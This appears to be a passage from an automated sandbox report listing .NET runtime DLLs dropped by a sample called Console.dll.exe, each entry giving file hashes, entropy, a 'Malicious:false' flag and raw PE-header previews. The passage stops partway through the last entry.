                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!......h..P................h...@...........................q......uq...@.............................................p... .........q..(....l.,E..P...p...........................................................p...H............text.....h.......h................. ..`.data.........h.......h.............@....reloc..,E....l..P....l.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.DispatchProxy.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):71840
                                                                                                                                                                                                                        Entropy (8bit):5.9789552449447845
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:2b7STGuD09fGRNvFzEyMuSxRVHJ4NZCJhYfrjSiaXCz1:2bulDbNvF4TxRViBrjsXCJ
                                                                                                                                                                                                                        MD5:70956517922A5228D5EED837605E48AE
                                                                                                                                                                                                                        SHA1:BF8899525148C3CC1C39A5ECB4A409143A68EB7E
                                                                                                                                                                                                                        SHA-256:615B5611BC593509909CEF4105BB74448EDE8E44B443466528844EB2FAA07DB6
                                                                                                                                                                                                                        SHA-512:EA15489E1BF089C8B3A74AE867827A3E0BD6C9B1F0B2A070B6329563771188886E9EF973F624BA22466B81AA12FBDFDB0DD5245692709F96E91AC01EE048E011
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9;............!.........0....................@.......................................@.................................................4...p........(..............p...............................................................H............text............................... ..`.data............ ..................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Emit.ILGeneration.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16048
                                                                                                                                                                                                                        Entropy (8bit):6.731246452704129
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:UWfxzWVUWip3WT56Os1HnhWgN7aIWfS/wbTseUfX01k9z3AcgkS5IqO:zpzWVUWic5kHRN79w/6fR9zjgO
                                                                                                                                                                                                                        MD5:19D7D3F573360D8497626BDE6368F433
                                                                                                                                                                                                                        SHA1:FC76B7BBCF62A375D66697D382BFB40D801D11C6
                                                                                                                                                                                                                        SHA-256:E76CD4D8FCFE1C2B9F295BBC8CD3A8F1F0E0346A1A37314BB7DDC0DD599ACD7A
                                                                                                                                                                                                                        SHA-512:DAE4CC94F123B2FCA4551CA378641DD9F5BF8D9758393CB0747786CCFCBDF7F9237EC6D2D68B9F6CF6D027ADC0A2AD1D6C4D65B3E3956544C566A77451A5D55A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0..............*... ........@.. ....................................`.................................;*..P....@...................(...`......0)..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p*......H........ ..`...................P ......................................R......?.y..UO.......C...D.T7.p...@....)...@t.B....\~f.Y"+.W....%.{....`....^39.k%`...6&..G.]...IB..m.h*RI.W.........GBSJB............v4.0.30319......`.......#~..l...D...#Strings............#GUID...........#Blob......................3................................................"...........;...........f.....!.b.....b.....7.................b...[.b.....b.....b.....b...B.b...O.b...v.............

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Emit.Lightweight.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16144
                                                                                                                                                                                                                        Entropy (8bit):6.711310745481565
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:jYWOVJWigTb2HRN7WkXC4deR9zZjmN3xG9b:jYa/iWkXC4dC9zZjy3x6b
                                                                                                                                                                                                                        MD5:1CF97BD1850BB312CE7FB7C0CC2C7507
                                                                                                                                                                                                                        SHA1:81358C83074C1DCE8FCFCFD27C5501A282D88CE8
                                                                                                                                                                                                                        SHA-256:152CD484C1BF881C075D6BE94BA178264A04214D2F328F5D2C0956BF4D31A1E0
                                                                                                                                                                                                                        SHA-512:169DB9A4FAF00D13597CD662C9C0F142F09EFF7035CEB6813A05F0F412AD8BE99DFE8E82EA3951DFE94B2533471F2D81EDE71A1ADD83AE5EC395FD3FCA5AB9FC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\............"!..0..............*... ........@.. ....................................`..................................)..V....@...................)...`.......(..T............................................ ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H........ ......................P ..........................................{?U..m..=L.}.D.\}...D..G...MbsZ.g.k......E.~_......{......T8...`.`i..C..hS`..+..*.._./|.....\;......e.(.;....}u.BSJB............v4.0.30319......`.......#~..4.......#Strings....<.......#GUID...L.......#Blob......................3................................................0...........I.k.........t...../.E.....E.....>.....~.....~.....E...i.E.....E.....E.....E...P.E...].E.................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Emit.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):125104
                                                                                                                                                                                                                        Entropy (8bit):6.2115332488845025
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:d7h40rWDTxH4blYxM6pADtoXLVPf1g/sVlcJrcBb0Fu7Zd7QiShdfkA+6ezI:d14P9YbKatgLVPfSsVkrc50OZl9sv+NU
                                                                                                                                                                                                                        MD5:7B80F3C4A1763845BB662E65E4F1A362
                                                                                                                                                                                                                        SHA1:F4DF1B9EDB2C66AC1789AFF822E66E1959898154
                                                                                                                                                                                                                        SHA-256:049EEBFC8DBD3BE52D2DF29906A821E6BBE7A413F27BEE6631CB1E92D60F318F
                                                                                                                                                                                                                        SHA-512:B81C7F7B851AC2F51F772D77F0F682906DF9BBE78C427798DC5A9A3C142C67CCB7C74444D2EF6A05C23D070D633822321F8C8BE3941A9B93563A5F1279973BEB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[..............!.........0....................@.................................:.....@..................................................&..@........(......,...$...p...............................................................H............text....p.......................... ..`.data............ ..................@....reloc..,...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Extensions.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15632
                                                                                                                                                                                                                        Entropy (8bit):6.802709001241744
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:mEDWKW0WWinTb2HRN7UUFDR9zkA4khan+:nDW4I/iU4l9zkTpn+
                                                                                                                                                                                                                        MD5:749C9D4CDA463606B3E004121915B2BA
                                                                                                                                                                                                                        SHA1:D75DE8F50267206838543D575B1E21281C9AA592
                                                                                                                                                                                                                        SHA-256:18037B68931DC7FCD8A09D3984B3F51149B609E5D56DCED16B7438E690495169
                                                                                                                                                                                                                        SHA-512:66F6982867EBE244FB8EDA8AC7FA98B2CCB4CAAAF3C6773523E61DF2FC137029EA25A0FA775E5BA2EF267F1B39E6875E4526B4526C5852A780069D84E0FBFA3F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>..........." ..0.............z)... ...@....... ....................................`.................................%)..O....@...................)...`......,(..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................Y)......H.......P ..\....................'......................................BSJB............v4.0.30319......l.......#~..(.......#Strings............#US.........#GUID...........#Blob......................3......................................................x.....3.....4.....^.................I....._.................w.................G...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Metadata.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1063072
                                                                                                                                                                                                                        Entropy (8bit):6.701207508493905
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:gL/Hg0G7BeawZ4d/M1e8mBOcOWmR/svUMNmGWHbSlXfksu:x0G7Beao4d/M1e8mBY1UEGWOXf8
                                                                                                                                                                                                                        MD5:4BB24586A651565C486A1BC670590991
                                                                                                                                                                                                                        SHA1:3AA58299EDE3A84E20A7A90FE99CC8164C64376B
                                                                                                                                                                                                                        SHA-256:C24E014FB60FDF7677F7D28DBEBF240E827FC559F8E875EAF5986EF607F15174
                                                                                                                                                                                                                        SHA-512:9D9CE093A90D5DBA04F5587AC3A9F46C595FA929BA184070E559D5E5296B2E04733E062A01627C3DFF07A907C6FD39A00803D4BEF2CBF5D72A29FEFE7280E678
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..............!......... ....................@..................................V....@.................................................X....g.......(......H`...W..p...............................................................H............text............................... ..`.data...l...........................@....reloc..H`.......p..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Primitives.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                        Entropy (8bit):6.776023458889442
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:isiCsWxwWE+WiYFuWXebPpUNTQHnhWgN7acWFDkmKoWyttuX01k9z3AWPoD9Z1Mg:mlcwWE+WiYFTb2HRN7XmKkSR9zdPa6pK
                                                                                                                                                                                                                        MD5:143146E96F6C64D92681542A3B38A8DE
                                                                                                                                                                                                                        SHA1:891524DFDBC2284659F10A355AC32BF632607ABB
                                                                                                                                                                                                                        SHA-256:F5CAACC538E169A06E3D6F8D47D0722D07A6DD3E5DF0F748E14D747424875F9B
                                                                                                                                                                                                                        SHA-512:D0689E6B3F32D62DB1FD5E57752D8FD6A67B40AD3235AAFE6329A1CC27013377D596B036ADE6981D7BEFD9F66386E9EC4003008D1B5F832910FC59044E57765F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}............."!..0..............+... ........@.. ....................................`.................................5+..V....@...................)...`......8*..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p+......H........ ..h...................P ......................................n......~.B.u....m*Mc.."....@...b....R.X.Q.}........Hr7...y.A,...}.CN...@...B.,..m`..y......Vo...c*.o.....8.25..1....o.AN)BSJB............v4.0.30319......`.......#~..........#Strings............#GUID...........#Blob......................3......................................3.........@...........Y.................?.g.....g.....`.................g...y.g.....g.....g.....g...`.g...m.g.................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.TypeExtensions.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):43168
                                                                                                                                                                                                                        Entropy (8bit):5.092878834280821
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:NWoeWiNQbYcpriTd0a+SK8DKAW6q6Tb2HRN7AHXHR9zkZ/u:5mcpGTR+j8nWu/iAB9z6/u
                                                                                                                                                                                                                        MD5:7A3A5A94875BE4A9166D71436EF94889
                                                                                                                                                                                                                        SHA1:2F24354ED26976F4C89E33235A743A75CB84C8B1
                                                                                                                                                                                                                        SHA-256:F44DABB65AC552A5CC9C68AF0C13A35FA00A100BA85E354B3366AAB5C3A44A76
                                                                                                                                                                                                                        SHA-512:6FCCA21E8C78FE081C50854F73500531EA1ECA7C6E48B0ED70D0E5E6B6F134341D685A3AC64A1995EAC48059FCC6FDD68D5A9D5C671892B749D72A8D0B964946
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.............!.....P... ...............`....@.......................................@..............................................................(...p..........p...............................................................H............text....C.......P.................. ..`.data...<....`.......`..............@....reloc.......p.......p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16656
                                                                                                                                                                                                                        Entropy (8bit):6.68060305220208
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:emmhW3CWiOTb2HRN79NkXC4deR9zZjmNTr:emm+l/iTkXC4dC9zZjyTr
                                                                                                                                                                                                                        MD5:5F5B8A8D15157DAB3905B92C1DA42C8D
                                                                                                                                                                                                                        SHA1:4824B4B8632F1405DA701240A505D4ECC4674829
                                                                                                                                                                                                                        SHA-256:31A53DA564683BAE857B1BB4996F6AA203551B9A3E4DC59C68E7A83D25456AE4
                                                                                                                                                                                                                        SHA-512:0FFD9737261B638C28F1995358044B8C51FD64A31CE51DE8224B2294C0A24932C2E92583C928DD4663755F3A6F84CAC84F31CD3235B9A34C246C72CC7E16689B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............,... ...@....... ..............................-.....`..................................,..O....@..d................)...`.......+..T............................................ ............... ..H............text........ ...................... ..`.rsrc...d....@......................@..@.reloc.......`......................@..B.................,......H.......P ......................4+......................................BSJB............v4.0.30319......l...l...#~......|...#Strings....T.......#US.X.......#GUID...h...|...#Blob......................3................................"...............M.............................q.6.../.6...........6.....6.....6.....6.....6...m.6.....6.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Resources.Reader.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15648
                                                                                                                                                                                                                        Entropy (8bit):6.771702068139618
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:b3iWJ3WiEa5kHRN7p9YkXC4deR9zZjmNX:bdorPYkXC4dC9zZjyX
                                                                                                                                                                                                                        MD5:433FC31437E629B6BF7C945FD5FA64A5
                                                                                                                                                                                                                        SHA1:8375231353EFDA7D883968F88831C9CAD9C62BD6
                                                                                                                                                                                                                        SHA-256:7CAAC5D77E2A25F018004C32066F77AC5802C0015430A45618B9611194FF7171
                                                                                                                                                                                                                        SHA-512:78679C6C8B2AC394B21C1D8699817EFA6D5F1102104FA2DA0CAA790FA703DED7F000FA322A0B269B0FA02B82D7B389857C41819DE7CB0BAE05A4AA38CCF53374
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H.!..........." ..0..............)... ...@....... ...............................y....`..................................(..O....@.................. )...`.......'..T............................................ ............... ..H............text... .... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ......................X'......................................BSJB............v4.0.30319......l.......#~......h...#Strings....t.......#US.x.......#GUID...........#Blob......................3..................................................%...x.%...3.....V.....^.................I....._.................w.................G...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Resources.ResourceManager.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16048
                                                                                                                                                                                                                        Entropy (8bit):6.695783606931323
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:X6tbgxAVgWYzWiS3WT56Os1HnhWgN7aIWf7k+xu3O6YX01k9z3ApF029q:Xa+lWYzWi75kHRN7qkYR9zqF02A
                                                                                                                                                                                                                        MD5:AB0CC89F3E7CD8430FC8AB006A4DF6E0
                                                                                                                                                                                                                        SHA1:CD3A2E876D2CFAAECBF572B25912EDD6A999A51A
                                                                                                                                                                                                                        SHA-256:84EFB0FC70C29B8A66FAB171BBEEBABF99071C030C1B3733587A45469CC2A488
                                                                                                                                                                                                                        SHA-512:27B1F694EBE121F8533835D4C3FDF58AD188EA6A808F32AC05F06396CAF320594190F1C0DF1F8FF1206C2384FFD51040A125B9254C355DFEAE5E70592D7001F6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8............" ..0.............n*... ...@....... ..............................,X....`..................................*..O....@...................(...`.......)..T............................................ ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................M*......H.......P ..H....................(......................................BSJB............v4.0.30319......l.......#~..|...,...#Strings............#US.........#GUID...........#Blob......................3................................................9...........U...................A.....A...........A...r.A.....A.....A.....A...Y.A...i.A.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Resources.Writer.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):51376
                                                                                                                                                                                                                        Entropy (8bit):5.647473718542034
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:6+6N5b6slE3D2/wKU5hZA+m7cARqy9z6y:6+Q50T2g/ZAzZqOz6y
                                                                                                                                                                                                                        MD5:8A7BD53E4CE42379FA24CE595F0EC5C7
                                                                                                                                                                                                                        SHA1:145E949DE042B4256612DD277F50D521265990CB
                                                                                                                                                                                                                        SHA-256:74CFA9C222B73AC46DB0EC0AE7B5FF1389DA123BEB51FCEC11EC9854B68E879E
                                                                                                                                                                                                                        SHA-512:45FC9E9B25BB50FE6B870C917BEFC1DD6D4A30373F005499BF04592F75A884CC016CA33D225CB9972D684F72601933A37536913F84FFE67FC366F380395F9727
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g..............!.....p... ....................@.................................tO....@..............................................................(..............p...............................................................H............text....b.......p.................. ..`.data...............................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15624
                                                                                                                                                                                                                        Entropy (8bit):6.799030013655915
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:aBxADhHBW22WiquWXebPpUNTQHnhWgN7acWi2jDSoyttuX01k9z3AWPoD9E+6:y8bW22WiqTb2HRN7Wj+NSR9zdPae+6
                                                                                                                                                                                                                        MD5:EE9406EF9D01F32143A912B48D6162D2
                                                                                                                                                                                                                        SHA1:3E796017CCE9CBB9D5DA1F5A19A5E22F09F3E0B5
                                                                                                                                                                                                                        SHA-256:617402E9732E193102FD5E7B6A9042B0A20A3C19A715997D1F65E0EC17B0E999
                                                                                                                                                                                                                        SHA-512:87F496E5A649F0D0CE76A1AD5C69688F294ADD10603139E7D7D408D8440E48D14813E288493DB25A01E0C5AD10EB2A648555D5DF9C297658893E415341D2722F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.V..........." ..0.............F)... ...@....... ..............................U.....`..................................(..O....@...................)...`.......'..T............................................ ............... ..H............text...L.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................%)......H.......P ......................d'......................................BSJB............v4.0.30319......l.......#~......d...#Strings....p.......#US.t.......#GUID...........#Blob......................3..................................................4.....4...Z.!...T...........@...........p...........U.......................<.....n...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.CompilerServices.VisualC.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):30896
                                                                                                                                                                                                                        Entropy (8bit):4.619507740475153
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:hWJLWiCD4lNB4WViG5kHRN7YGUR9zqYyB:8iDKB5erY9ze
                                                                                                                                                                                                                        MD5:47BA19026C99223104F474A7F81CF0B7
                                                                                                                                                                                                                        SHA1:6265412EDF3B015FB1B4C7A73217D809F2F25E99
                                                                                                                                                                                                                        SHA-256:B4FC00368CAD7477A2F7B18CDF3A543BB28B3CCE360FB8055D678E6C5A2BECFB
                                                                                                                                                                                                                        SHA-512:BDA0EAC28392D52EA78D50B883275A96DF426B15B0DC90B28CDADAF47014F848AF77A5BCFC7D90C13DBBA2EB6E8299150631D6F2B2730D4EA6D2A92A773E8766
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0n.............!..... ... ...............0....@..........................P............@.....................................................`....P...(...@..,.......p...............................................................H............text............ .................. ..`.data........0.......0..............@....reloc..,....@.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Extensions.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):18192
                                                                                                                                                                                                                        Entropy (8bit):6.550675936096809
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:fYSj5rt9x+AoKs1WvNWiATb2HRN7qkXC4deR9zZjmNnwJ:fTj1ttlb6/iqkXC4dC9zZjyC
                                                                                                                                                                                                                        MD5:CADD9E61BBA2203B02B2DE1820C10FDF
                                                                                                                                                                                                                        SHA1:16227D2C164B5B1B9D911EFE5809DF8D8D90C40E
                                                                                                                                                                                                                        SHA-256:B861F7304987FA345F8826EBE8C6A33C1C7E7DFA9491617F75B65A8CB01A4180
                                                                                                                                                                                                                        SHA-512:1B3B22E2D8E3887DABF6B687FACC7D028D986BD36B90EADF65AF81161FCE1AC2FC431587BED75F7775584FA19BA38F8B18E7BD19BC504451C22B17D1D2EDA372
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....T..........." ..0.............22... ...@....... ..............................gj....`..................................1..O....@...................)...`.......0..T............................................ ............... ..H............text...8.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................2......H.......P ......................l0......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................I.....3...................................................i.v.........N...........%.....B.....5.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Handles.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15632
                                                                                                                                                                                                                        Entropy (8bit):6.813358105490951
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:NKfLoOai7IWGmWiKTb2HRN711kXC4deR9zZjmNeeQX:wzoOWR/i11kXC4dC9zZjyeX
                                                                                                                                                                                                                        MD5:74B8B43F47597BA1889401715F6E1165
                                                                                                                                                                                                                        SHA1:58182A52595097FF132ED6D0478E393BE457A447
                                                                                                                                                                                                                        SHA-256:48B0AD6925B2047881DF39BDA28BF007FD1BA5542D8B35C4CCCCB2CD20BB2D7C
                                                                                                                                                                                                                        SHA-512:F2069913F0CB70733033418AFF81133C62F3380F9E324D513B77105032E7728989EFFD9775DED6321C26634B39A48355EC8ADD47A04B4372994A2F24328A85EA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.&..........." ..0..............)... ...@....... ..............................,L....`..................................)..O....@...................)...`.......(..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................(......................................BSJB............v4.0.30319......l.......#~..D.......#Strings....0.......#US.4.......#GUID...D.......#Blob......................3................................................(.`.....`...f.................L...........|...........a.......................H.....z...................(.....(.....(...).(...1.(...9.(...A.(...I.(...Q.(...Y.(...a.(...i.(...q.(...y.(.......................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.InteropServices.JavaScript.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):51376
                                                                                                                                                                                                                        Entropy (8bit):4.951459376990979
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:SOwMiFMwIIVu3vjfxskmzzVsPk7bbCzWt:SpdVovjUxEk7bWCt
                                                                                                                                                                                                                        MD5:DD204CDE069C68DB4FB88DB076224266
                                                                                                                                                                                                                        SHA1:0A5185D18AC13E619161874247E882AB77466BC6
                                                                                                                                                                                                                        SHA-256:5925A5C2EF75242E2C33DD0183BF9E30B2B8F067BEF754DBD1DD68097EFFFD07
